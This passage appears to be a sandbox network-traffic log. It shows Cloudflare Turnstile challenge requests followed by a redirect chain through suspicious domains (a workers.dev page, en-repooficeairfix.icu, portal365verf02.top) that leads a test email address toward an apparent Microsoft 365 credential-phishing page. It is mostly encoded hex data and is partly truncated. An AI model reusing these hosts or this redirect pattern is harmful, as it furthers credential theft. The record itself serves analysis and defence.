W6pqXa5abv6cjmrOncq8zI1c+y0s/o0NPhvev4AAPy1gTC8gH3CPf+ChLh7/XpEw4CCOf0/AoA8QkW7fvuFAAl4CQFHgn1FwHnECPrEAwqKBQjF/UFK/c2EwAYFfw2Ax8EJAMiSEhBIh8wR0pNPlMUQU5aGzdMWFc/TFs0HjplJmFlW1UqZGBqREJpbGFgaUp5cnM7aW5wPHlsd21+UXpxdYeER0pGikuJi4dRZGWOj1dnkpKZjJpeoX+XnY2Un
2025-01-15 19:06:03 UTC	1369	IN	Data Raw: 4c 76 4c 33 45 7a 64 50 76 79 2b 6e 55 37 39 48 30 38 75 6a 57 38 39 43 35 39 65 48 72 34 74 37 37 41 4e 50 54 2f 73 6a 6d 35 67 30 48 7a 51 63 4c 34 42 48 6f 39 65 4d 4d 41 2f 66 6f 36 66 76 35 32 68 77 56 42 41 48 78 41 51 54 65 4a 50 34 62 34 75 6b 4c 44 53 50 36 4d 69 62 76 41 79 41 73 49 42 6f 6c 4d 68 30 4c 4b 6a 55 55 45 79 73 36 46 52 51 51 50 45 41 31 51 43 6b 45 4a 69 49 72 4d 41 4d 6c 4c 6a 41 4e 4d 7a 59 30 56 44 63 36 4b 46 42 48 55 6a 31 59 4f 6c 31 62 55 54 39 63 4f 53 4a 65 53 6c 52 4c 52 32 52 6f 50 44 78 6e 4d 55 39 50 64 57 38 32 62 33 4e 4a 65 46 64 62 58 57 31 5a 63 7a 73 39 57 32 52 56 56 6e 52 71 53 47 70 32 61 32 4e 6a 63 59 56 31 6c 59 47 4f 69 31 4b 4e 6a 58 31 61 6a 4a 32 58 6e 5a 53 56 6a 6e 65 53 6e 6d 57 59 6b 34 68 35 65 6f Data Ascii: LvL3EzdPvy+nU79H08ujW89C59eHr4t77ANPT/sjm5g0HzQcL4BHo9eMMA/fo6fv52hwVBAHxAQTeJP4b4ukLDSP6MibvAyAsIBolMh0LKjUUEys6FRQQPEA1QCkEJiIrMAMlLjANMzY0VDc6KFBHUj1YOl1bUT9cOSJeSlRLR2RoPDxnMU9PdW82b3NJeFdbXW1Zczs9W2RVVnRqSGp2a2NjcYV1lYGOi1KNjX1ajJ2XnZSVjneSnmWYk4h5eo
2025-01-15 19:06:03 UTC	1369	IN	Data Raw: 30 64 43 76 78 64 4c 56 79 4e 58 71 32 38 7a 64 31 65 44 51 33 64 6a 69 2b 75 6e 6b 35 73 50 4d 36 65 6e 62 44 4f 37 76 38 50 48 78 38 73 38 49 39 66 6e 54 36 66 6e 37 45 77 4c 38 2f 67 45 43 41 41 58 30 2f 52 63 48 43 52 67 4f 44 41 77 77 45 68 41 52 43 68 41 55 4b 2f 67 54 47 43 38 4f 47 52 7a 32 50 43 49 65 45 52 49 69 4a 67 41 57 48 53 63 70 49 69 67 72 43 42 34 78 4d 43 45 75 51 7a 4e 4c 4a 6a 6f 32 4b 54 34 34 4f 78 64 63 50 54 38 63 4a 55 42 44 57 31 52 4b 53 46 39 4b 54 55 78 6a 55 6b 35 53 4c 45 5a 57 56 45 56 57 56 56 68 5a 62 46 46 63 54 57 4a 76 58 33 64 69 59 57 4e 41 57 6d 70 6e 61 49 68 70 62 45 68 52 63 57 39 4c 6c 48 56 31 5a 58 70 32 64 6d 6c 79 63 6e 35 59 62 6f 43 42 63 5a 42 2f 67 35 74 36 69 59 68 6b 62 59 32 4c 6f 34 61 4c 6a 35 47 Data Ascii: 0dCvxdLVyNXq28zd1eDQ3dji+unk5sPM6enbDO7v8PHx8s8I9fnT6fn7EwL8/gECAAX0/RcHCRgODAwwEhARChAUK/gTGC8OGRz2PCIeERIiJgAWHScpIigrCB4xMCEuQzNLJjo2KT44OxdcPT8cJUBDW1RKSF9KTUxjUk5SLEZWVEVWVVhZbFFcTWJvX3diYWNAWmpnaIhpbEhRcW9LlHV1ZXp2dmlycn5YboCBcZB/g5t6iYhkbY2Lo4aLj5G
2025-01-15 19:06:03 UTC	1369	IN	Data Raw: 63 58 6e 33 62 37 4f 2b 51 4c 73 7a 65 2f 6c 78 76 51 43 43 76 54 56 39 2b 33 4e 79 4f 6b 53 42 38 62 56 38 75 6a 70 41 78 6a 34 33 50 62 39 38 64 6e 37 41 65 48 63 45 77 54 30 2b 52 51 6b 44 66 30 58 4c 41 33 77 43 77 38 52 4e 43 4d 78 37 77 4d 54 47 66 6e 30 4b 7a 76 34 48 77 45 38 49 55 45 45 4b 44 49 78 52 55 70 41 4b 77 30 75 48 56 41 2f 55 44 45 67 48 6a 59 58 49 6a 4a 59 46 41 38 55 4f 7a 4e 59 54 31 39 58 4c 7a 39 46 4a 6c 78 58 61 46 39 73 57 32 74 4e 4f 7a 46 53 4d 6e 52 4f 63 7a 41 72 4f 46 64 51 58 6d 74 2b 63 30 74 62 59 55 4a 42 63 34 46 41 69 57 4b 4a 68 49 52 70 69 56 31 62 61 33 46 54 64 6f 4f 56 6b 4a 42 31 6c 57 6d 63 69 35 32 59 6d 48 36 64 63 57 39 2f 68 57 61 6b 6c 36 6d 6b 70 49 71 70 66 62 43 66 73 61 79 73 6a 37 47 46 67 35 4f 5a Data Ascii: cXn3b7O+QLsze/lxvQCCvTV9+3NyOkSB8bV8ujpAxj43Pb98dn7AeHcEwT0+RQkDf0XLA3wCw8RNCMx7wMTGfn0Kzv4HwE8IUEEKDIxRUpAKw0uHVA/UDEgHjYXIjJYFA8UOzNYT19XLz9FJlxXaF9sW2tNOzFSMnROczArOFdQXmt+c0tbYUJBc4FAiWKJhIRpiV1ba3FTdoOVkJB1lWmci52YmH6dcW9/hWakl6mkpIqpfbCfsaysj7GFg5OZ

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:04 UTC	599	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1497844684:1736965888:hR1bQafLozQXnmaBH5lAypMI_u7ggQ5Cnikt2oePCQI/902823eb1c368c99/ae1BCWt9k0HcV1Stw.aqaNNjGsPp.vEgo6dugpndcQs-1736967958-1.1.1.1-SrGUcSV2bImxYiTTejixzDrtDboHC6MPNX7hfWvhi72sA8.3NMOByHbV8EB8W0OX HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:06:04 UTC	442	IN	HTTP/1.1 400 Bad Request Date: Wed, 15 Jan 2025 19:06:04 GMT Content-Type: application/json Content-Length: 14 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: OsSzB0aIQrFni2I2p4RfU0mJhagpiucT9vYezS3o5ZnSL67HGcbiO+06knV0IhAvyW5yLgt8R24dK4gy8W9USg==$N6jjOcPCaoQMa2BQzJH43A== Server: cloudflare CF-RAY: 902824128b46438b-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 19:06:04 UTC	14	IN	Data Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d Data Ascii: {"err":100230}

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:11 UTC	1172	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1497844684:1736965888:hR1bQafLozQXnmaBH5lAypMI_u7ggQ5Cnikt2oePCQI/902823eb1c368c99/ae1BCWt9k0HcV1Stw.aqaNNjGsPp.vEgo6dugpndcQs-1736967958-1.1.1.1-SrGUcSV2bImxYiTTejixzDrtDboHC6MPNX7hfWvhi72sA8.3NMOByHbV8EB8W0OX HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 34713 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded CF-Chl-RetryAttempt: 0 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: ae1BCWt9k0HcV1Stw.aqaNNjGsPp.vEgo6dugpndcQs-1736967958-1.1.1.1-SrGUcSV2bImxYiTTejixzDrtDboHC6MPNX7hfWvhi72sA8.3NMOByHbV8EB8W0OX sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5ourm/0x4AAAAAAA44TVMLbqDkCk-m/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:06:11 UTC	16384	OUT	Data Raw: 76 5f 39 30 32 38 32 33 65 62 31 63 33 36 38 63 39 39 3d 2d 68 48 59 52 5a 25 32 62 69 72 45 68 43 68 43 57 68 2b 4b 2b 45 49 4c 77 69 65 61 43 42 46 43 4f 59 30 48 65 39 43 59 56 4d 43 5a 72 65 5a 43 34 52 43 37 48 65 49 43 54 59 2b 50 4d 48 59 43 57 48 43 35 6e 59 65 73 43 35 50 2b 71 43 24 59 50 2b 37 43 32 47 6c 51 71 43 5a 68 43 37 43 48 6f 33 45 73 59 41 78 52 69 35 45 74 4b 6b 6b 49 6f 37 59 4b 33 43 64 59 65 64 73 49 38 43 41 47 62 43 41 4c 5a 36 2b 74 4e 4a 59 59 43 65 24 43 65 54 48 43 43 61 33 59 4c 43 78 64 72 43 24 72 34 4a 2b 43 39 38 48 59 65 36 78 55 6c 74 45 58 4b 35 43 2b 32 38 78 4a 41 74 39 72 72 50 43 45 47 73 61 4b 24 2b 5a 48 56 50 43 48 46 6b 33 59 73 45 4e 30 59 50 33 59 67 44 6c 54 58 75 43 35 56 67 6e 6d 35 4f 52 69 61 6e 6b 39 Data Ascii: v_902823eb1c368c99=-hHYRZ%2birEhChCWh+K+EILwieaCBFCOY0He9CYVMCZreZC4RC7HeICTY+PMHYCWHC5nYesC5P+qC$YP+7C2GlQqCZhC7CHo3EsYAxRi5EtKkkIo7YK3CdYedsI8CAGbCALZ6+tNJYYCe$CeTHCCa3YLCxdrC$r4J+C98HYe6xUltEXK5C+28xJAt9rrPCEGsaK$+ZHVPCHFk3YsEN0YP3YgDlTXuC5Vgnm5ORiank9
2025-01-15 19:06:11 UTC	16384	OUT	Data Raw: 49 2b 45 43 4b 59 49 44 65 4c 2b 59 2b 4b 2b 41 43 39 24 4f 57 65 43 77 48 43 52 4c 72 59 35 48 43 38 43 2b 73 35 59 5a 36 43 41 59 24 72 2b 44 43 4e 59 37 72 5a 41 43 49 43 5a 73 43 71 43 2d 59 77 47 2b 4c 43 53 59 45 46 47 4b 43 57 59 5a 76 78 77 62 33 61 34 48 2b 44 43 43 43 24 34 36 69 61 59 4b 4a 5a 4c 43 6c 66 73 57 2b 44 43 6a 33 30 58 5a 33 43 42 59 35 59 4b 4d 62 7a 66 56 59 5a 71 43 6e 69 24 74 65 4b 2b 61 43 6d 73 34 35 47 65 48 5a 77 5a 4b 2b 48 33 79 77 2b 44 43 47 4c 30 59 5a 24 50 74 59 2b 50 24 45 2b 34 59 2d 47 65 6f 43 70 59 79 47 2b 41 43 47 43 2b 37 43 6f 43 58 4c 32 68 2b 63 59 37 59 30 4a 38 42 49 74 50 43 4c 5a 4b 2b 33 66 4e 63 7a 4b 2b 67 66 64 59 2b 72 43 41 43 65 59 43 44 33 47 59 35 50 5a 48 59 75 43 2d 72 2b 4d 64 6f 43 48 50 Data Ascii: I+ECKYIDeL+Y+K+AC9$OWeCwHCRLrY5HC8C+s5YZ6CAY$r+DCNY7rZACICZsCqC-YwG+LCSYEFGKCWYZvxwb3a4H+DCCC$46iaYKJZLClfsW+DCj30XZ3CBY5YKMbzfVYZqCni$teK+aCms45GeHZwZK+H3yw+DCGL0YZ$PtY+P$E+4Y-GeoCpYyG+ACGC+7CoCXL2h+cY7Y0J8BItPCLZK+3fNczK+gfdY+rCACeYCD3GY5PZHYuC-r+MdoCHP
2025-01-15 19:06:11 UTC	1945	OUT	Data Raw: 51 72 43 70 50 48 55 68 6f 62 63 46 54 6e 55 44 49 57 50 46 69 2b 5a 43 76 66 34 78 50 74 67 71 68 2d 69 5a 46 6b 65 44 5a 73 65 54 43 68 69 24 48 49 43 6b 63 55 5a 56 4f 6b 43 65 59 43 2b 2d 59 43 75 59 43 59 5a 6e 35 47 59 45 4c 2d 6e 76 37 53 32 4b 6c 55 53 76 48 7a 50 2b 37 4f 67 65 49 33 4f 51 34 77 44 38 73 2b 77 43 33 6e 61 6f 5a 72 43 24 55 35 4e 5a 48 59 6e 75 42 69 58 39 4f 4b 49 45 64 74 32 43 33 69 2b 7a 2b 2b 50 72 6b 58 48 4f 49 43 45 68 2d 59 6b 79 34 34 70 76 72 43 51 68 45 68 24 4c 2b 59 43 59 34 47 58 2b 75 30 78 56 58 34 7a 33 36 33 70 35 69 65 56 6f 75 59 41 57 37 68 79 62 50 4b 72 2b 52 65 5a 4c 30 77 5a 4e 6a 66 43 43 67 59 48 43 32 48 32 59 2b 73 43 70 50 43 68 43 64 43 73 48 63 24 69 36 43 65 59 65 30 58 7a 62 51 64 2b 65 5a 34 2d Data Ascii: QrCpPHUhobcFTnUDIWPFi+ZCvf4xPtgqh-iZFkeDZseTChi$HICkcUZVOkCeYC+-YCuYCYZn5GYEL-nv7S2KlUSvHzP+7OgeI3OQ4wD8s+wC3naoZrC$U5NZHYnuBiX9OKIEdt2C3i+z++PrkXHOICEh-Yky44pvrCQhEh$L+YCY4GX+u0xVX4z363p5ieVouYAW7hybPKr+ReZL0wZNjfCCgYHC2H2Y+sCpPChCdCsHc$i6CeYe0XzbQd+eZ4-
2025-01-15 19:06:12 UTC	1308	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 19:06:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4776 Connection: close cf-chl-out-s: hrdah6s9fG1k9DbezbLoQ75SZ/+je/CTRSP0zAZT9gvk3kvNAYi4oNExeQCMe2fKr7wJXhizuKPmdMSfJG6ENdO1uay+dCyzwAFrvLqvJHDBGqxigkaYEXKOdAEGLFf7+LFVyoWHNssBtbwyvMnoxPMj+nIgq05hGJK1WENGd6nm7/k/rbXikd8ym4tWUbBxBcQqmhdDx4Tj3QZn1Fz9SkBoVW3ub/tV7gKKIUwYDeYzFLF1HWcD+Ie1vkrut47w2OdvA6xXIBLFQuS607M9WzM69XKHDx/yvUK35US5p2CE62+H5X2p6Knr/RpxS3XjpalK3RzgJuOWnEDigys0WpRqJTwFbGUSJQtU0eG6n/lynQA411JDSW3ibztruJ+TR6CJhVajbox0RgmVv4uN/efIuukTZdsFnMrknGGWJZSKZc09eqRu6OFKp5l0o0HaTaIoOucylAFAfyCzMwLa+d9u6x9IsRUTztv4Nq+p9lruKaI9DF3jZd6wgOpKMI9hxOi6FSAVarY1OQoY8qLdcfZ8xsgwOjZnoU4C/D+NhwDAiNeCDG++7wfFU5l0Ru8AlCYJguefTXe4FmjhH+d5uOghMU3yMTt+dkDrEWfmI9p712Aq+jzCwpYiR37F0Be4jWNY+N74Ztegoo9hiioiORUKJP2uwEoIiURtogAunFVMiLERXc8CV058BS/D9dFapQuD3vaETg27zB/1iBhsIfFt7E5FfpzJEqUXIaVp06gHvJyunBfp3Xe4t1HOXc3LpIT7OQEzLJ2Tj/LZkdHclS35fqIEYS9JPDo/DS6/KZ+44p1qXydnxQrq9wcsJAqqQvlJAYUGx9ZDyqtlEctC3V5J+BjfTi6wniRgP29T9ZLkobOSI0khwulVBG/VfUw/tURWDwkJHAtKVJrOnZZzEef1zOBReGm/tB45f+yF4zKYKyWMg30i4GBMKBLDjuMyz3N2T4yIHGLhm8WZKBTnhgPCCDCJI7BdsPVWcohQJ5Be8PO9xS [TRUNCATED]
2025-01-15 19:06:12 UTC	229	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 4d 31 54 55 45 47 67 56 63 63 41 69 57 47 6e 74 6a 53 52 74 4c 6e 4c 38 6d 78 77 58 65 6d 62 56 6d 4b 6c 4d 54 33 4b 44 64 65 6e 36 41 58 76 36 68 5a 65 36 77 56 66 38 50 78 77 4e 51 76 2b 7a 34 49 6a 65 68 4c 48 4d 34 43 4f 2b 4e 66 62 63 32 6c 56 63 6d 5a 48 70 33 6a 50 4d 4d 38 56 6e 34 38 58 62 65 72 49 58 32 59 30 3d 24 46 4f 49 35 37 43 63 6e 62 48 65 42 41 37 5a 55 51 62 42 4a 65 77 3d 3d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 32 38 32 34 34 30 34 39 66 36 37 63 37 38 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: cf-chl-out: M1TUEGgVccAiWGntjSRtLnL8mxwXembVmKlMT3KDden6AXv6hZe6wVf8PxwNQv+z4IjehLHM4CO+Nfbc2lVcmZHp3jPMM8Vn48XberIX2Y0=$FOI57CcnbHeBA7ZUQbBJew==Server: cloudflareCF-RAY: 9028244049f67c78-EWRalt-svc: h3=":443"; ma=86400
2025-01-15 19:06:12 UTC	1201	IN	Data Raw: 76 49 43 72 75 4c 2b 6b 6a 73 61 79 67 59 47 46 75 5a 32 39 71 61 2f 4e 6b 49 69 6e 6e 34 7a 51 71 37 50 57 74 4e 61 73 7a 72 2b 31 71 61 44 66 72 74 57 62 30 35 6d 2f 78 72 54 69 76 4c 37 45 79 64 44 43 79 4e 43 73 79 38 44 54 36 37 6e 6a 39 65 76 51 39 4f 36 2f 79 77 50 38 37 63 38 44 42 65 6e 62 42 75 6e 68 39 2f 34 4e 42 67 30 54 2f 67 6b 56 46 67 6f 57 34 75 6f 51 2b 52 33 2b 2f 68 51 64 39 76 34 65 46 42 37 76 48 51 41 58 48 66 30 71 37 43 51 43 44 41 63 6d 4c 44 59 67 49 69 76 32 4d 52 55 36 4d 2f 6e 31 47 50 73 68 41 6b 4a 48 42 67 56 47 46 55 63 61 46 51 77 2f 50 55 6f 36 54 45 59 6d 4b 78 55 54 4b 44 52 49 56 55 35 52 51 44 6b 59 50 55 73 75 4e 56 55 6b 51 6a 74 4a 5a 78 34 71 59 43 45 6d 59 44 38 2f 58 44 35 4a 55 57 46 78 53 47 70 7a 4f 33 31 Data Ascii: vICruL+kjsaygYGFuZ29qa/NkIinn4zQq7PWtNaszr+1qaDfrtWb05m/xrTivL7EydDCyNCsy8DT67nj9evQ9O6/ywP87c8DBenbBunh9/4NBg0T/gkVFgoW4uoQ+R3+/hQd9v4eFB7vHQAXHf0q7CQCDAcmLDYgIiv2MRU6M/n1GPshAkJHBgVGFUcaFQw/PUo6TEYmKxUTKDRIVU5RQDkYPUsuNVUkQjtJZx4qYCEmYD8/XD5JUWFxSGpzO31
2025-01-15 19:06:12 UTC	1369	IN	Data Raw: 55 6b 37 4f 68 73 44 46 51 55 6c 55 41 77 75 4b 68 38 31 53 43 30 6a 4c 56 55 79 58 45 70 65 4d 6c 35 66 54 54 63 62 4c 69 38 39 50 30 6f 36 51 45 55 6f 61 7a 77 35 54 55 34 2f 5a 54 52 50 4e 56 4d 77 4e 55 78 48 62 6a 67 78 63 56 31 30 57 48 4e 52 59 47 46 66 58 55 68 65 65 6b 6c 64 57 6f 4a 69 59 6d 6c 74 67 35 56 75 6c 33 6c 56 62 49 35 70 68 31 36 68 6a 48 4a 7a 65 33 57 59 66 4a 57 4a 69 32 75 46 70 48 71 48 6e 35 75 69 63 37 53 69 74 34 36 6c 6c 5a 46 37 68 33 69 58 69 33 65 68 65 70 43 31 6e 62 71 59 6b 62 2b 41 6f 4c 36 56 71 71 62 50 70 59 32 69 6e 71 58 43 72 74 66 44 79 4c 50 5a 71 71 69 64 30 72 6d 37 75 74 61 31 32 37 54 45 76 61 50 46 74 4f 76 48 75 38 6d 77 32 36 58 4b 73 4d 32 31 35 65 66 57 75 65 71 37 75 39 49 41 38 2b 76 5a 33 64 45 44 Data Ascii: Uk7OhsDFQUlUAwuKh81SC0jLVUyXEpeMl5fTTcbLi89P0o6QEUoazw5TU4/ZTRPNVMwNUxHbjgxcV10WHNRYGFfXUheekldWoJiYmltg5Vul3lVbI5ph16hjHJze3WYfJWJi2uFpHqHn5uic7Sit46llZF7h3iXi3ehepC1nbqYkb+AoL6VqqbPpY2inqXCrtfDyLPZqqid0rm7uta127TEvaPFtOvHu8mw26XKsM215efWueq7u9IA8+vZ3dED
2025-01-15 19:06:12 UTC	1369	IN	Data Raw: 78 4b 49 53 4e 50 4c 6a 4e 54 4e 41 6b 58 4b 44 51 58 55 31 74 4f 50 55 6b 2f 57 45 78 61 49 56 35 45 61 56 6c 6e 57 57 63 6f 51 7a 35 4c 4c 47 6b 73 55 6d 51 30 5a 58 56 33 5a 47 31 45 55 56 56 57 65 32 39 57 51 6c 6c 54 68 6c 46 30 65 45 6d 41 67 34 6c 70 6a 47 42 64 58 47 6c 77 62 31 4e 31 6b 6c 53 57 56 6f 6c 31 68 6c 35 35 66 5a 36 61 6f 58 2b 55 68 4a 53 6a 5a 48 36 46 69 35 75 68 71 4b 69 6c 6e 34 56 79 6b 71 4f 57 69 36 71 31 6d 4a 65 61 6e 72 32 4e 77 70 62 45 67 5a 61 63 79 61 58 48 6f 4a 69 5a 69 59 36 62 6f 63 75 6f 6e 70 54 54 72 61 4b 51 6b 37 47 6d 30 72 2f 66 6e 4a 79 30 71 39 4b 64 72 70 2f 5a 34 73 4f 71 76 62 57 73 6f 65 4f 6a 30 4f 53 76 38 62 48 75 74 4d 54 45 37 63 33 54 32 50 4c 53 31 77 48 31 41 2f 62 77 32 77 6a 35 2f 63 6e 6b 32 Data Ascii: xKISNPLjNTNAkXKDQXU1tOPUk/WExaIV5EaVlnWWcoQz5LLGksUmQ0ZXV3ZG1EUVVWe29WQllThlF0eEmAg4lpjGBdXGlwb1N1klSWVol1hl55fZ6aoX+UhJSjZH6Fi5uhqKiln4VykqOWi6q1mJeanr2NwpbEgZacyaXHoJiZiY6bocuonpTTraKQk7Gm0r/fnJy0q9Kdrp/Z4sOqvbWsoeOj0OSv8bHutMTE7c3T2PLS1wH1A/bw2wj5/cnk2
2025-01-15 19:06:12 UTC	837	IN	Data Raw: 46 49 44 52 4d 4b 79 4e 4a 46 43 38 37 53 79 35 4e 4d 6b 51 31 55 44 39 46 49 54 39 44 52 69 59 6c 58 6c 70 6a 63 46 4a 4f 5a 32 77 75 59 46 56 70 51 32 30 30 56 6c 31 74 59 46 4a 73 64 58 6c 69 65 33 5a 56 69 48 4e 73 66 32 64 58 66 6f 56 69 65 34 5a 50 54 55 36 4b 6a 6c 4a 76 68 5a 46 7a 61 58 2b 56 62 33 47 4d 6d 6e 36 4f 6c 33 68 6c 68 35 64 6b 69 34 36 69 67 58 35 6b 6e 6f 4a 78 69 36 61 74 6a 6e 69 75 73 5a 71 36 73 35 42 39 77 61 4f 6b 67 70 47 30 67 61 4b 6c 71 61 69 4e 75 62 43 4b 6b 59 72 41 69 34 32 52 78 4b 6e 49 32 72 6e 54 75 72 32 37 30 37 37 66 7a 4e 6a 47 6f 39 54 4a 77 75 72 4b 70 63 61 74 32 73 43 36 37 74 2f 71 35 4f 58 53 36 38 72 5a 36 4e 76 73 74 4f 37 50 31 67 54 32 34 4d 4c 6d 35 4f 62 57 2b 66 66 47 42 74 66 39 79 4d 72 73 41 75 Data Ascii: FIDRMKyNJFC87Sy5NMkQ1UD9FIT9DRiYlXlpjcFJOZ2wuYFVpQ200Vl1tYFJsdXlie3ZViHNsf2dXfoVie4ZPTU6KjlJvhZFzaX+Vb3GMmn6Ol3hlh5dki46igX5knoJxi6atjniusZq6s5B9waOkgpG0gaKlqaiNubCKkYrAi42RxKnI2rnTur27077fzNjGo9TJwurKpcat2sC67t/q5OXS68rZ6NvstO7P1gT24MLm5ObW+ffGBtf9yMrsAu

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:12 UTC	589	OUT	OPTIONS /?ctsllixw&qrc=test@test.org HTTP/1.1 Host: en-repooficeairfix.icu Connection: keep-alive Accept: / Access-Control-Request-Method: GET Access-Control-Request-Headers: qrc-auth Origin: https://52f1897b.5648702dd4d5255cab645104.workers.dev User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Sec-Fetch-Dest: empty Referer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:06:12 UTC	168	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Date: Wed, 15 Jan 2025 19:06:12 GMT Connection: close Transfer-Encoding: chunked
2025-01-15 19:06:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:13 UTC	773	OUT	GET /?ctsllixw&qrc=test@test.org HTTP/1.1 Host: en-repooficeairfix.icu Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" accept: application/json qrc-auth: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://52f1897b.5648702dd4d5255cab645104.workers.dev Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:06:13 UTC	330	IN	HTTP/1.1 200 OK Set-Cookie: qPdM=QhXqWRaLdCoJ; path=/; samesite=none; secure; httponly Set-Cookie: qPdM.sig=2wRe3PLXmOt5cQBI4VBvailOcWU; path=/; samesite=none; secure; httponly content-type: application/json Access-Control-Allow-Origin: * Date: Wed, 15 Jan 2025 19:06:13 GMT Connection: close Transfer-Encoding: chunked
2025-01-15 19:06:13 UTC	348	IN	Data Raw: 31 35 30 0d 0a 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 70 6f 72 74 61 6c 33 36 35 76 65 72 66 30 32 2e 74 6f 70 2f 3f 64 61 74 61 58 58 30 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 31 63 6d 77 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 33 42 76 63 6e 52 68 62 44 4d 32 4e 58 5a 6c 63 6d 59 77 4d 69 35 30 62 33 41 76 49 69 77 69 5a 47 39 74 59 57 6c 75 49 6a 6f 69 63 47 39 79 64 47 46 73 4d 7a 59 31 64 6d 56 79 5a 6a 41 79 4c 6e 52 76 63 43 49 73 49 6d 74 6c 65 53 49 36 49 6c 46 6f 57 48 46 58 55 6d 46 4d 5a 45 4e 76 53 69 49 73 49 6e 46 79 59 79 49 36 49 6e 52 6c 63 33 52 41 64 47 56 7a 64 43 35 76 63 6d 63 69 4c 43 4a 70 59 58 51 69 4f 6a 45 33 4d 7a 59 35 4e 6a 63 35 Data Ascii: 150{"url":"https://portal365verf02.top/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3BvcnRhbDM2NXZlcmYwMi50b3AvIiwiZG9tYWluIjoicG9ydGFsMzY1dmVyZjAyLnRvcCIsImtleSI6IlFoWHFXUmFMZENvSiIsInFyYyI6InRlc3RAdGVzdC5vcmciLCJpYXQiOjE3MzY5Njc5

Timestamp	Bytes transferred	Direction	Data
2025-01-15 19:06:14 UTC	373	OUT	GET /?ctsllixw&qrc=test@test.org HTTP/1.1 Host: en-repooficeairfix.icu Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 19:06:14 UTC	594	IN	HTTP/1.1 302 Found Set-Cookie: qPdM=ftYHT3GSqGuC; path=/; samesite=none; secure; httponly Set-Cookie: qPdM.sig=hUikkNDtV-aWkZ3wtnpzF5nh2Cs; path=/; samesite=none; secure; httponly location: https://portal365verf02.top/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3BvcnRhbDM2NXZlcmYwMi50b3AvIiwiZG9tYWluIjoicG9ydGFsMzY1dmVyZjAyLnRvcCIsImtleSI6ImZ0WUhUM0dTcUd1QyIsInFyYyI6InRlc3RAdGVzdC5vcmciLCJpYXQiOjE3MzY5Njc5NzQsImV4cCI6MTczNjk2ODA5NH0.jTcyUqYjKiN8a3rooRgvvOoXZXUeN8_PT53X1To-DvI Date: Wed, 15 Jan 2025 19:06:14 GMT Connection: close Transfer-Encoding: chunked
